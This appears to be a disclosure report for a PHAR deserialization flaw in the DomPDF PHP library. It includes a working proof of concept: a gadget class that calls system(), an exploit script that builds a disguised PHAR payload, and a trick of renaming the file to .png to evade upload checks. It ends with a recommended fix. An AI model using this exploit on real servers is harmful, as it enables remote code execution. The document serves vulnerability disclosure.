Description

DomPDF is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_get_contents() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and
instantiate arbitrary PHP objects. This can lead to remote code execution especially when DOMPdf is used with frameworks with documented POP chains like Laravel / vulnerable developer code.

Proof of Concept

1. Setup the following code in /var/www/html: vuln.php represents our use of DOMPdf functions and phar-poc.php represents code with a vulnerable POP chain.

// vuln.php
<?php
// Include autoloader 
require_once 'dompdf/autoload.inc.php'; 

// Include vulnerable objects
include("phar-poc.php");

// Reference the Dompdf namespace 
use Dompdf\Dompdf; 
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);

// Load HTML content 
$dompdf-&gt;loadHtml('<img src>'); 
// (Optional) Setup the paper size and orientation 
$dompdf-&gt;setPaper('A4', 'landscape'); 
 
// Render the HTML as PDF 
$dompdf-&gt;render(); 
 
// Output the generated PDF to Browser 
//$dompdf-&gt;stream(); 

?&gt;

// phar-poc.php
<?php

class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}

2. As an attacker, we generate our PHAR payload using the following exploit script:

<?php

class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

3. Generate with:

php --define phar.readonly=0 create_phar.php

and execute vuln.php with php vuln.php, you should see whoami being executed

Note that after generating the PHAR exploit code, an attacker can rename it to whatever extension or filename they want, it is possible to rename it test.phar to test.png to bypass any file extension check by the developer and specify phar://test.png in the src attribute.

Impact

This vulnerability is capable of remote code execution if DOMPdf is used with frameworks or developer code with vulnerable POP chains.

Recommended Fix:

Filter the phar:// protocol.